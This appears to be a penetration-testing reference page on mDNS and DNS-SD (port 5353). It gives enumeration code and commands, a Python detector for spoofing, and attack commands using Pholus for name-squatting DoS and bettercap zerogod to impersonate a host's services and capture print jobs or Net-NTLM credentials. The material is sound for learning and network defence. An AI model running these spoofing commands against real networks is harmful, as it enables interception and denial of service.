Multicast DNS (mDNS) and DNS-SD - PORT 5353/UDP

Basic Information

Multicast DNS (mDNS) enables DNS-like name resolution and service discovery inside a local link without a unicast DNS server.

  • Port: 5353/UDP

  • Multicast addresses:

    • 224.0.0.251 (IPv4)

    • FF02::FB (IPv6)

It’s most commonly associated with Apple Bonjour, IoT devices, and DNS-SD (DNS Service Discovery).

Key Protocol Details

  • Names in the .local zone are resolved via mDNS.

  • The QU (query unicast) bit, the top bit of a question's QCLASS field, asks responders to reply by unicast to the querier instead of multicasting the answer. In responses the same bit position is the cache-flush flag.

  • Implementations should drop mDNS packets whose source is not on the local link (RFC 6762 §11), but some stacks answer them anyway, which exposes the service to off-link attackers.

  • Probing and announcing enforce unique host and service names: a host first probes for the name it wants and backs off if anyone answers with a conflicting record. Answering probes with forged conflicts forces renames or keeps the host from claiming a name at all (DoS / name squatting).

DNS-SD Service Model

Services are advertised as _<service>._tcp or _<service>._udp under .local. Examples:

  • _ipp._tcp.local → printers

  • _airplay._tcp.local → AirPlay

  • _adb._tcp.local → Android Debug Bridge

Enumeration is a chain of queries: PTR for _services._dns-sd._udp.local lists the service types present on the link, PTR for a type (e.g. _ipp._tcp.local) lists its instance names, SRV and TXT on an instance give its host, port and metadata, and A/AAAA on the host give the addresses.
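The query chain above, and the QU bit from the protocol notes, in working code. This is an added example, not code from this page or from any of the tools it mentions: a stdlib-only Python codec that builds an mDNS query with QU set, parses PTR/SRV/TXT/A answers (including compressed names and the cache-flush bit) and walks PTR -> SRV/TXT -> A. SAMPLE_RESPONSE, the instance "Lab Printer", the host printer.local and the address 192.0.2.20 are constructed for illustration; send_query() is the only part that touches the network and is what you would call on a real link.

```python
"""Minimal mDNS/DNS-SD codec (stdlib only): build a query with the QU bit, parse
PTR/SRV/TXT/A answers and follow the PTR -> SRV/TXT -> A chain of DNS-SD."""
import socket, struct

MDNS_GROUP, MDNS_PORT = "224.0.0.251", 5353
A, PTR, TXT, SRV = 1, 12, 16, 33
QU_BIT = FLUSH_BIT = 0x8000  # top class bit: QU in questions (RFC 6762 5.4), cache-flush in answers (10.2)

def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"

def build_query(name, qtype=PTR, unicast_response=True):
    """One-question mDNS query; ID and flags are zero as RFC 6762 requires."""
    qclass = 1 | (QU_BIT if unicast_response else 0)
    return struct.pack("!6H", 0, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, qclass)

def decode_name(data, off):
    """Decode a possibly compressed name -> (name, offset just after it)."""
    labels, end = [], None
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:  # compression pointer: follow it, remember where we left off
            end = off + 2 if end is None else end
            off = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("utf-8", "replace"))
        off += length
    return ".".join(labels) + ".", (end if end is not None else off)

def parse_response(data):
    """Return [(name, rtype, cache_flush, ttl, value)] for every RR in the packet."""
    _, _flags, qd, an, ns, ar = struct.unpack("!6H", data[:12])
    off = 12
    for _ in range(qd):  # skip questions (mDNS responses usually carry none)
        off = decode_name(data, off)[1] + 4
    records = []
    for _ in range(an + ns + ar):
        name, off = decode_name(data, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        rd_off, off = off + 10, off + 10 + rdlen
        rdata = data[rd_off:off]
        if rtype == PTR:
            value = decode_name(data, rd_off)[0]
        elif rtype == SRV:  # priority, weight, port, then the target host name
            value = (decode_name(data, rd_off + 6)[0], struct.unpack("!HHH", rdata[:6])[2])
        elif rtype == TXT:  # sequence of <len>key=value strings
            value, i = {}, 0
            while i < len(rdata):
                n = rdata[i]
                key, _, val = rdata[i + 1:i + 1 + n].decode("utf-8", "replace").partition("=")
                value[key], i = val, i + 1 + n
        else:  # A becomes a dotted quad; AAAA, NSEC, ... are left raw
            value = socket.inet_ntoa(rdata) if rtype == A else rdata
        records.append((name, rtype, bool(rclass & FLUSH_BIT), ttl, value))
    return records

def dns_sd_chain(records):
    """Resolve each PTR-advertised instance to its type, host, port, addresses and TXT."""
    by = {}
    for name, rtype, _, _, value in records:
        by.setdefault((name, rtype), []).append(value)
    services = {}
    for (stype, rtype), instances in by.items():
        for inst in (instances if rtype == PTR else []):
            srv = by.get((inst, SRV))
            if srv:  # service-type PTRs (answers to _services._dns-sd._udp.local) have no SRV
                host, port = srv[0]
                services[inst] = {"type": stype, "host": host, "port": port,
                                  "addrs": by.get((host, A), []), "txt": by.get((inst, TXT), [{}])[0]}
    return services

def encode_rr(name, rtype, rdata, ttl=4500, flush=True):
    return encode_name(name) + struct.pack("!HHIH", rtype, 1 | (FLUSH_BIT if flush else 0), ttl, len(rdata)) + rdata

# Constructed reply an IPP printer might send to a PTR query for _ipp._tcp.local; names and 192.0.2.20 are made up.
SAMPLE_RESPONSE = (
    struct.pack("!6H", 0, 0x8400, 0, 3, 0, 1)  # flags QR|AA, 3 answers, 1 additional record
    + encode_rr("_ipp._tcp.local.", PTR, encode_name("Lab Printer._ipp._tcp.local."), flush=False)
    + encode_rr("Lab Printer._ipp._tcp.local.", SRV, struct.pack("!HHH", 0, 0, 631) + encode_name("printer.local."))
    + encode_rr("Lab Printer._ipp._tcp.local.", TXT,
                b"".join(bytes([len(s)]) + s.encode() for s in ("txtvers=1", "rp=ipp/print")))
    + encode_rr("printer.local.", A, socket.inet_aton("192.0.2.20"))
)

def send_query(name="_services._dns-sd._udp.local.", qtype=PTR, timeout=2.0):
    """Multicast the query and yield (source_ip, records) per reply; QU makes responders answer this socket."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(name, qtype), (MDNS_GROUP, MDNS_PORT))
    while True:
        try:
            data, (src, _) = sock.recvfrom(9000)
        except socket.timeout:
            return
        yield src, parse_response(data)
```

On a host attached to the target link, iterate over send_query() to list service types, then send_query("_ipp._tcp.local.") and pass each reply's records to dns_sd_chain() to get host, port, addresses and TXT per instance. If unicast_response is False the answers go to 224.0.0.251:5353 and a one-shot tool would have to join the group to see them, which is why the QU bit is convenient for scanners.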

Nmap scan result example:

PORT     STATE SERVICE
5353/udp open  zeroconf

Enumeration

Nmap

nmap -sU -p 5353 --script=dns-service-discovery <target>

Broadcast discovery (on host):

# No target needed: multicasts the query and lists every responder on the link
sudo nmap --script=broadcast-dns-service-discovery

Avahi (Linux)

# List service types seen on the link (the type shows up in the name column, e.g. _http _tcp)
avahi-browse -t _services._dns-sd._udp

# Browse all services and resolve to host/port
avahi-browse -art

Apple dns-sd (macOS)

# Browse all HTTP services
dns-sd -B _http._tcp

# Enumerate service types
dns-sd -B _services._dns-sd._udp

# Resolve a specific instance
dns-sd -L "My Printer" _ipp._tcp local

Packet Capture with Tshark

# Live capture
sudo tshark -i eth0 -f "udp port 5353" -Y mdns

# Only DNS-SD service list queries
sudo tshark -i eth0 -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""

Tip: Browsers that implement WebRTC mDNS ICE candidates hide local IPs behind ephemeral hostnames (random-UUID.local). If you see these in captures or candidates, resolve them with an mDNS A/AAAA query to recover the real address and pivot.


Exploitations

DoS / Name Squatting

During the probing phase a host queries for the name it intends to use and only claims it if nobody answers. Spoofing conflicting answers forces it to pick a new name (host-2.local, host-3.local, ...) and, after fifteen conflicts within ten seconds, to throttle its probing to one attempt every five seconds (RFC 6762 §9), which keeps the device off the name it wants.

Example with Pholus:

# Block new devices from taking names
sudo python3 pholus3.py eth0 -afre -stimeout 1000

Service Spoofing & Impersonation (MitM)

Impersonate advertised services (printers, AirPlay, HTTP) to coerce clients into connecting to you.

  • Capture print jobs by spoofing _ipp._tcp.local

  • Lure users to rogue HTTP services

  • Capture or relay Net-NTLM authentication when a Windows client resolves a .local name to your spoofed SMB/HTTP service

With bettercap’s zerogod module:

# Discover services
sudo bettercap -iface eth0 -eval "zerogod.discovery on"

# Impersonate all services of a host
zerogod.impersonate 192.168.1.42

# Save intercepted print jobs
set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
zerogod.impersonate 192.168.1.42
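On the defensive side, both attacks above leave the same footprint in mDNS responses: a unique name (a hostname or a service instance) answered from more than one source IP, or answers arriving from a source that is not on the local link. This added example, which is not from this page or from Pholus/bettercap, scores tshark field output for those two indicators. The SAMPLE lines are constructed rather than a real capture, the subnet passed to find_indicators() is an assumption you set per network, and a host that legitimately changes IP over DHCP also trips the multiple-owners rule, so treat hits as hunt leads rather than verdicts.

```python
"""Flag mDNS name-squatting / impersonation indicators in tshark field output.
Input lines: frame.time_epoch <TAB> ip.src <TAB> dns.resp.name (comma-joined)."""
import ipaddress
from collections import defaultdict

# Constructed sample (not a real capture) of:
#   tshark -i eth0 -f "udp port 5353" -Y "dns.flags.response == 1" \
#          -T fields -e frame.time_epoch -e ip.src -e dns.resp.name
SAMPLE = """\
1700000000.10\t192.168.1.42\tprinter.local,Lab Printer._ipp._tcp.local,_ipp._tcp.local
1700000000.95\t192.168.1.42\tprinter.local
1700000001.20\t192.168.1.77\tprinter.local,_ipp._tcp.local
1700000002.00\t10.9.8.7\tnas.local
"""

def parse_fields(text):
    """-> [(timestamp, source_ip, [answer names])]; IPv6 responders (ipv6.src) are not covered here."""
    rows = []
    for line in text.splitlines():
        ts, src, names = line.split("\t")
        rows.append((float(ts), src, [n for n in names.split(",") if n]))
    return rows

def is_unique_name(name):
    """Host names and service-instance names must have a single owner (RFC 6762 s8, s9).
    Service-type names such as _ipp._tcp.local or _services._dns-sd._udp.local are shared
    PTR records that every host offering the service legitimately answers, so skip them."""
    return not name.split(".")[0].startswith("_")

def find_indicators(rows, local_net):
    net = ipaddress.ip_network(local_net)
    owners = defaultdict(set)  # unique name -> set of responder IPs seen claiming it
    alerts = []
    for ts, src, names in rows:
        if ipaddress.ip_address(src) not in net:
            # mDNS is link-local: a responder outside the local subnet is spoofed or mis-forwarded
            alerts.append(("off-link-responder", src, ts))
        for name in filter(is_unique_name, names):
            owners[name].add(src)
    for name, srcs in sorted(owners.items()):
        if len(srcs) > 1:  # the same unique name answered from two hosts: conflict or impersonator
            alerts.append(("multiple-owners", name, tuple(sorted(srcs))))
    return alerts

if __name__ == "__main__":
    for alert in find_indicators(parse_fields(SAMPLE), "192.168.1.0/24"):
        print(*alert)
```

To run it against a live link, pipe the tshark command from the comment (add -l so lines are flushed as they arrive) into a loop that reads stdin instead of SAMPLE; a zerogod impersonation of 192.168.1.42 shows up as a second owner for every unique name that host advertises.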

Recent Vulnerabilities

  • Avahi (Linux mDNS daemon)

    • CVE-2023-38469 to CVE-2023-38473 (2023): reachable assertions in avahi-daemon, triggerable with crafted mDNS records or D-Bus calls

    • Exploitation crashes avahi-daemon and disrupts discovery on the host

  • Cisco IOS XE Wireless LAN Controller

    • mDNS gateway DoS (2024, CVE-2024-20303)

    • Adjacent attacker can trigger high CPU & disconnect APs

